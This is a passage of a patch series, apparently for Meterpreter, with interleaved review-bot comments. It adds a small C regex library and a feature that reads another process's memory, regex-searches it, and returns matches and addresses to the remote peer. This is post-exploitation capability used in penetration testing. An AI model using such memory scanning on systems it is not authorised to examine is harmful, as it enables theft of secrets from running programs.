'.' or '$' */ + default: + { + re_compiled[j].type = CHAR; + re_compiled[j].u.ch = pattern[i]; + } break; + } + } + /* '\\' as last char in pattern -> invalid regular expression. */ +/* + else + { + re_compiled[j].type = CHAR; + re_compiled[j].ch = pattern[i]; + } +*/ + } break; + + /* Character class: */ + case '[': + { + /* Remember where the char-buffer starts. 
*/ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i+1] == '^') + { + re_compiled[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */ + { + return 0; + } + } + else + { + re_compiled[j].type = CHAR_CLASS; + } + + /* Copy characters inside [..] to buffer */ + while ( (pattern[++i] != ']') + && (pattern[i] != '\0')) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 0; + } + ccl_buf[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + ccl_buf[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + /* Null-terminate string end */ + ccl_buf[ccl_bufidx++] = 0; + re_compiled[j].u.ccl = &ccl_buf[buf_begin]; + } break; + + /* Other characters: */ + default: + { + re_compiled[j].type = CHAR; + re_compiled[j].u.ch = c; + } break; + } + /* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */ + if (pattern[i] == 0) + { + return 0; + } + + i += 1; + j += 1; + } + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + re_compiled[j].type = UNUSED; + + return (re_t) re_compiled; +} + +void re_print(regex_t* pattern) +{ + const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" }; + + int i; + int j; + 
char c; + for (i = 0; i < MAX_REGEXP_OBJECTS; ++i) + { + if (pattern[i].type == UNUSED) + { + break; + } + + printf("type: %s", types[pattern[i].type]); + if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS) + { + printf(" ["); + for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j) + { + c = pattern[i].u.ccl[j]; + if ((c == '\0') || (c == ']')) + { + break; + } + printf("%c", c); + } + printf("]"); + } + else if (pattern[i].type == CHAR) + { + printf(" '%c'", pattern[i].u.ch); + } + printf("\n"); + } +} + + + +/* Private functions: */ +static int matchdigit(char c) +{ + return isdigit(c); +} +static int matchalpha(char c) +{ + return isalpha(c); +} +static int matchwhitespace(char c) +{ + return isspace(c); +} +static int matchalphanum(char c) +{ + return ((c == '_') || matchalpha(c) || matchdigit(c)); +} +static int matchrange(char c, const char* str) +{ + return ( (c != '-') + && (str[0] != '\0') + && (str[0] != '-') + && (str[1] == '-') + && (str[2] != '\0') + && ( (c >= str[0]) + && (c <= str[2]))); +} +static int matchdot(char c) +{ +#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1) + (void)c; + return 1; +#else + return c != '\n' && c != '\r'; +#endif +} +static int ismetachar(char c) +{ + return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D')); +} + +static int matchmetachar(char c, const char* str) +{ + switch (str[0]) + { + case 'd': return matchdigit(c); + case 'D': return !matchdigit(c); + case 'w': return matchalphanum(c); + case 'W': return !matchalphanum(c); + case 's': return matchwhitespace(c); + case 'S': return !matchwhitespace(c); + default: return (c == str[0]); + } +} + +static int matchcharclass(char c, const char* str) +{ + do + { + if (matchrange(c, str)) + { + return 1; + } + else if (str[0] == '\\') + { + /* Escape-char: increment str-ptr and match on next char */ + str += 1; + if (matchmetachar(c, str)) + { + return 1; + } + else if ((c == str[0]) && !ismetachar(c)) + { + return 
1; + } + } + else if (c == str[0]) + { + if (c == '-') + { + return ((str[-1] == '\0') || (str[1] == '\0')); + } + else + { + return 1; + } + } + } + while (*str++ != '\0'); + + return 0; +} + +static int matchone(regex_t p, char c) +{ + switch (p.type) + { + case DOT: return matchdot(c); + case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl); + case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl); + case DIGIT: return matchdigit(c); + case NOT_DIGIT: return !matchdigit(c); + case ALPHA: return matchalphanum(c); + case NOT_ALPHA: return !matchalphanum(c); + case WHITESPACE: return matchwhitespace(c); + case NOT_WHITESPACE: return !matchwhitespace(c); + default: return (p.u.ch == c); + } +} + +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + size_t prelen = *matchlength; + const char* prepoint = text; + while ((text_offset < text_length) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (&text[text_offset] >= prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + return 1; + (*matchlength)--; + } + + *matchlength = prelen; + return 0; +} + +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + const char* prepoint = text; + while ((text_offset < text_length) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (text > prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + return 1; + (*matchlength)--; + } + + return 0; +} + +static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + if (p.type == UNUSED) + return 1; + if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + return 1; + if ((text_offset < text_length) && matchone(p, 
text[text_offset++])) + { + if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + { + (*matchlength)++; + return 1; + } + } + return 0; +} + + +#if 0 + +/* Recursive matching */ +static int matchpattern(regex_t* pattern, const char* text, int *matchlength) +{ + int pre = *matchlength; + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[1], &pattern[2], text, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return text[0] == '\0'; + } + else if ((text[0] != '\0') && matchone(pattern[0], text[0])) + { + (*matchlength)++; + return matchpattern(&pattern[1], text+1); + } + else + { + *matchlength = pre; + return 0; + } +} + +#else + +/* Iterative matching */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + size_t pre = *matchlength; + do + { + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return (text_offset == text_length - 1); + } +/* Branching is not working properly + else if (pattern[1].type == BRANCH) + { + return (matchpattern(pattern, text) || matchpattern(&pattern[2], text)); + } +*/ + (*matchlength)++; + } + while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++])); + + 
*matchlength = pre; + return 0; +} + +#endif diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h new file mode 100644 index 000000000..bd084cccb --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.h 
@@ -0,0 +1,75 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + +#ifndef _TINY_REGEX_C +#define _TINY_REGEX_C + +#ifndef RE_DOT_MATCHES_NEWLINE +/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */ +#define RE_DOT_MATCHES_NEWLINE 1 +#endif + +#ifdef __cplusplus +extern "C"{ +#endif + +// size_t for 32-bit compilation. +#include + +typedef struct regex_t +{ + unsigned char type; /* CHAR, STAR, etc. */ + union + { + unsigned char ch; /* the character itself */ + unsigned char* ccl; /* OR a pointer to characters in class */ + } u; +} regex_t; + +/* Typedef'd pointer to get abstract datatype. */ +typedef struct regex_t* re_t; + + +/* Compile regex string pattern to a regex_t-array. */ +re_t re_compile(const char* pattern, size_t pattern_length); + + +/* Find matches of the compiled pattern inside text. */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); + + +/* Find matches of the txt pattern inside text (will compile automatically first). 
*/ +int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength); + + +#ifdef __cplusplus +} +#endif + +#endif /* ifndef _TINY_REGEX_C */ diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt index f783b441a..813117b2d 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt @@ -22,6 +22,7 @@ include_directories(../../source/common) include_directories(../../source/jpeg-8) include_directories(../../source/ReflectiveDLLInjection/common) include_directories(../../source/extensions/stdapi/server) +include_directories(../../source/tiny-regex-c) set(SRC_DIR ../../source/extensions/stdapi) file(GLOB_RECURSE SRC_FILES @@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES ${SRC_DIR}/*.cpp ${SRC_DIR}/*.rc ${MOD_DEF_DIR}/extension.def + ../../source/tiny-regex-c/*.c ) list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c) diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj index 238aa06ee..8256f7229 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj @@ -559,6 +559,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + @@ -587,6 +588,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + From 72b39289d0878181a096019a1dc799ce1bde0d18 Mon Sep 17 00:00:00 2001 
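Review bot: The include guard `_TINY_REGEX_C` is a reserved identifier (a leading underscore followed by an uppercase letter belongs to the implementation); `TINY_REGEX_C_H` avoids the clash. The `#include` directive under the `// size_t for 32-bit compilation.` comment shows no header name in this rendering, presumably `<stddef.h>` lost as markup, so it is worth confirming the file really names the header that the `size_t` parameters of `re_compile`/`re_matchp` depend on. The feature list still advertises `'[^abc]'` while marking it "currently broken"; since compiled patterns arrive from the peer, that line should state whether inverted classes are rejected by `re_compile` or silently mismatch, so callers can decide what to do with them.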
From: sjanusz-r7 Date: Fri, 1 Dec 2023 17:32:06 +0000 Subject: [PATCH 02/14] Compile regex in-place, rename CHAR to CHAR_RE due to Windows typedef'ing CHAR, correctly free compiled needle and associated buffer --- .../stdapi/server/sys/process/memory.c | 309 +++++++++++------- c/meterpreter/source/tiny-regex-c/re.c | 250 +++++++------- c/meterpreter/source/tiny-regex-c/re.h | 12 +- 3 files changed, 305 insertions(+), 266 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index ea8ae32be..4d2eef43a 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -341,10 +341,6 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } -typedef NTSTATUS* PNTSTATUS; - -#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) - #ifndef __kernel_entry #define __kernel_entry #endif @@ -353,8 +349,6 @@ typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE Proce typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); -typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead); - typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); 
@@ -370,9 +364,6 @@ typedef enum _MEMORY_INFORMATION_CLASS { MemoryBasicInformation } MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html -typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, PSIZE_T ResultLength); - typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; @@ -391,27 +382,6 @@ typedef struct _OBJECT_ATTRIBUTES { PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; -// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057 -typedef struct _CLIENT_ID { - HANDLE UniqueProcess; - HANDLE UniqueThread; -} CLIENT_ID, * PCLIENT_ID; - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html -// https://ntdoc.m417z.com/ntopenprocess -typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); - -//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -//{ -// DWORD dwLength; -// DWORD dwInitialized; -// LPVOID lpSsHandle; -// LIST_ENTRY InLoadOrderModuleList; -// LIST_ENTRY InMemoryOrderModuleList; -// LIST_ENTRY InInitializationOrderModuleList; -// LPVOID lpEntryInProgress; -//} PEB_LDR_DATA, * PPEB_LDR_DATA; - typedef struct _RTL_USER_PROCESS_PARAMETERS { BYTE Reserved1[16]; PVOID Reserved2[10]; 
@@ -473,10 +443,165 @@ struct regex_needle char* raw_needle_buffer; size_t length; regex_t* compiled_needle; + unsigned char* char_buf; }; #define NEEDLES_MAX (size_t)5 +#define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) + +/// +/// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. +/// +/// The packet to insert the needle goup into +/// ERROR_SUCCESS on success, else non-zero +NTSTATUS add_needle_results_to_packet(Packet** out, const char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +{ + if (out == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + + dprintf("[MEM SEARCH] Creating results group"); + + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + + dprintf("[MEM SEARCH] Adding Match bytes"); + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. 
+ met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); + + dprintf("[MEM SEARCH] Adding Match address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + + dprintf("[MEM SEARCH] Adding Region base address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); + + dprintf("[MEM SEARCH] Adding Region size"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); + + dprintf("[MEM SEARCH] Adding Match Length"); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); + + dprintf("[MEM SEARCH] Adding Group"); + met_api->packet.add_group(*out, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + return ERROR_SUCCESS; +} + +/// +/// Compile a regular expression in-place. +/// +/// A pointer to a regular expression needle struct. +/// ERROR_SUCCESS on success, ERROR_INVALID_PARAMETER when provided with a null pointer or the regular expression failed to compile +NTSTATUS re_compile_inplace(struct regex_needle** in_out) +{ + if (in_out == NULL) { return ERROR_INVALID_PARAMETER; } + const int compile_result = re_compile((*in_out)->raw_needle_buffer, (*in_out)->length, MAX_REGEXP_OBJECTS, MAX_CHAR_CLASS_LEN, &(*in_out)->compiled_needle, &(*in_out)->char_buf); + if (compile_result != ERROR_SUCCESS) { return ERROR_INVALID_PARAMETER; } + + return ERROR_SUCCESS; +} + +/// +/// Sets up a regular expression needle from a TLV. +/// +/// - Pointer to the needle TLV received from the server containing the needle buffer +/// - The compiled needle +/// ERROR_SUCCESS on success, non-zero on failure +NTSTATUS setup_needle_from_tlv(const Tlv* needle_buffer_tlv, struct regex_needle** out) +{ + // The header contains a null-terminator which we do not need. 
+ dprintf("[MEM SEARCH] Getting needle length"); + const size_t needle_length = needle_buffer_tlv->header.length - 1; + if (needle_length == 0) { dprintf("[MEM SEARCH] Got a needle length of 0"); return ERROR_INVALID_PARAMETER; } + + (*out)->length = needle_length; + dprintf("[MEM SEARCH] Allocating memory for needle buffer"); + (*out)->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); + if ((*out)->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Copying TLV buffer to needle"); + memcpy((*out)->raw_needle_buffer, (char*)needle_buffer_tlv->buffer, needle_length); + + dprintf("[MEM SEARCH] Allocating memory for a compiled needle"); + (*out)->compiled_needle = (regex_t*)malloc(MAX_REGEXP_OBJECTS * sizeof(struct regex_t)); + if ((*out)->compiled_needle == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a compiled needle"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Allocating memory for a char buffer"); + (*out)->char_buf = (unsigned char*)malloc(MAX_CHAR_CLASS_LEN * sizeof(unsigned char)); + if ((*out)->char_buf == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a char buffer"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv->buffer); + const NTSTATUS compile_result = re_compile_inplace(&(*out)); + if (compile_result != ERROR_SUCCESS) + { dprintf("[MEM SEARCH] Failed to compile needle"); return ERROR_INVALID_PARAMETER; } + + return ERROR_SUCCESS; +} + +NTSTATUS cleanup_needle(struct regex_needle** in) +{ + if (in == NULL || *in == NULL) { return ERROR_INVALID_PARAMETER; } + + if ((*in)->raw_needle_buffer != NULL) + { + dprintf("[MEM SEARCH] Freeing needle buffer"); + free((*in)->raw_needle_buffer); + } + + if ((*in)->char_buf != NULL) + { + dprintf("[MEM SEARCH] Freeing char buf"); + free((*in)->char_buf); + } + + if ((*in)->compiled_needle != 
NULL) + { + dprintf("[MEM SEARCH] Freeing compiled needle"); + free((*in)->compiled_needle); + } + + dprintf("[MEM SEARCH] Freeing regex needle."); + free((*in)); + return ERROR_SUCCESS; +} + +static HMODULE hKernel32 = NULL; +static HMODULE hNTDLL = NULL; + +static GETPROCADDRESS fGetProcAddress = NULL; +static OPENPROCESS fOpenProcess = NULL; +static CLOSEHANDLE fCloseHandle = NULL; +static VIRTUALQUERYEX fVirtualQueryEx = NULL; +static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; + +BOOL setup_handles() +{ + if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((hNTDLL = GetModuleHandleA("ntdll.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((fGetProcAddress = (GETPROCADDRESS)GetProcAddress(hKernel32, "GetProcAddress")) == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); return ERROR_INVALID_ADDRESS; } + + if ((fVirtualQueryEx = (VIRTUALQUERYEX)fGetProcAddress(hKernel32, "VirtualQueryEx")) == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); return ERROR_INVALID_ADDRESS; } + + if ((fOpenProcess = (OPENPROCESS)fGetProcAddress(hKernel32, "OpenProcess")) == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); return ERROR_INVALID_ADDRESS; } + + if ((fCloseHandle = (CLOSEHANDLE)fGetProcAddress(hKernel32, "CloseHandle")) == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); return ERROR_INVALID_ADDRESS; } + + if ((fNtReadVirtualMemory = (NTREADVIRTUALMEMORY)fGetProcAddress(hNTDLL, "NtReadVirtualMemory")) == NULL ) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); return ERROR_INVALID_ADDRESS; } + + return ERROR_SUCCESS; +} + +/* + * Read through all of a process's virtual memory in the search for regular expression needles. + * + * req: TLV_TYPE_PID - The target process ID. 
+ * req: TLV_TYPE_MEMORY_SEARCH_NEEDLE - The regular expression needle to search for. + * req: TLV_TYPE_UINT - The minimum length of a match. + * req: TLV_TYPE_MEMORY_SEARCH_MATCH_LEN - The maximum length of a match. + */ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { Packet* response = met_api->packet.create_response(packet); 
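Review bot: `add_needle_results_to_packet` copies `(DWORD)match_length + 1` bytes from `memory_buffer_ptr` into TLV_TYPE_MEMORY_SEARCH_MATCH_STR, one byte more than the match that was found; when a match ends on the last byte of the `MEMORY_BUFFER_SIZE` read buffer that extra byte is read past the allocation, and the code this replaces (removed in a later hunk) sent exactly `current_match_length` bytes, so drop the `+ 1`: `met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length);`. In `setup_needle_from_tlv`, `needle_buffer_tlv->header.length - 1` wraps when the peer sends a zero-length needle TLV (assuming `header.length` is an unsigned field, as TLV headers are), so the `needle_length == 0` guard never fires and a huge `malloc`/`memcpy` is attempted; check `if (needle_buffer_tlv->header.length < 2)` before subtracting. `setup_handles` is declared `BOOL` yet returns `ERROR_INVALID_HANDLE`/`ERROR_INVALID_ADDRESS` and its caller stores the result in an `NTSTATUS`; `static NTSTATUS setup_handles(void)` matches its use, and the other new helpers in this hunk are file-local and could be `static` as well. `cleanup_needle` frees `*in` but leaves the caller's pointer dangling; `free(*in); *in = NULL;` makes a second call harmless.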
@@ -484,33 +609,28 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) char* buffer = NULL; size_t needle_enum_index = 0; HANDLE process_handle = NULL; + struct regex_needle* regex_needles[NEEDLES_MAX]; - dprintf("[MEM SEARCH] Getting PID..."); + dprintf("[MEM SEARCH] Getting PID"); const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } dprintf("[MEM SEARCH] Searching PID: %lu", pid); - // Iterate over all the needles in the packet. Tlv needle_buffer_tlv = { 0 }; - struct regex_needle* regex_needles[NEEDLES_MAX]; - while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) { - // The header contains a null-terminator which we do not need. 
- const size_t needle_length = needle_buffer_tlv.header.length - 1; dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } - - regex_needles[needle_enum_index]->length = needle_length; - regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); - if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; } - memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length); - - dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length); - - dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer); - regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length); - if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; } + + dprintf("[MEM SEARCH] Setting up needle from TLV"); + const NTSTATUS needle_setup_result = setup_needle_from_tlv(&needle_buffer_tlv, ®ex_needles[needle_enum_index]); + if (needle_setup_result != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to setup needle from TLV packet"); + result = needle_setup_result; + goto done; + } needle_enum_index++; } 
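Review bot: When `setup_needle_from_tlv` fails, `regex_needles[needle_enum_index]` and whatever buffers it allocated before the failing step are leaked: the code jumps to `done` without incrementing `needle_enum_index`, and the cleanup loop in the later hunk only visits indices below it. The struct also comes from `malloc`, so its `raw_needle_buffer`/`char_buf`/`compiled_needle` fields are indeterminate until each is assigned, which is why `cleanup_needle` cannot simply be called on a half-initialised needle today. Allocate with `regex_needles[needle_enum_index] = (struct regex_needle*)calloc(1, sizeof(struct regex_needle));` and, in the failure branch, call `cleanup_needle(&regex_needles[needle_enum_index]);` before `goto done`. The enclosing function continues outside this hunk.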
@@ -522,52 +642,23 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) const size_t current_max_match_length = max_match_length; dprintf("[MEM SEARCH] Getting handles & proc addresses"); - const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll"); - if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } - - const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll"); - if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } - - const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress"); - if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; } - const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address; - - const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx"); - if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess"); - if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle"); - if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory"); - if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result 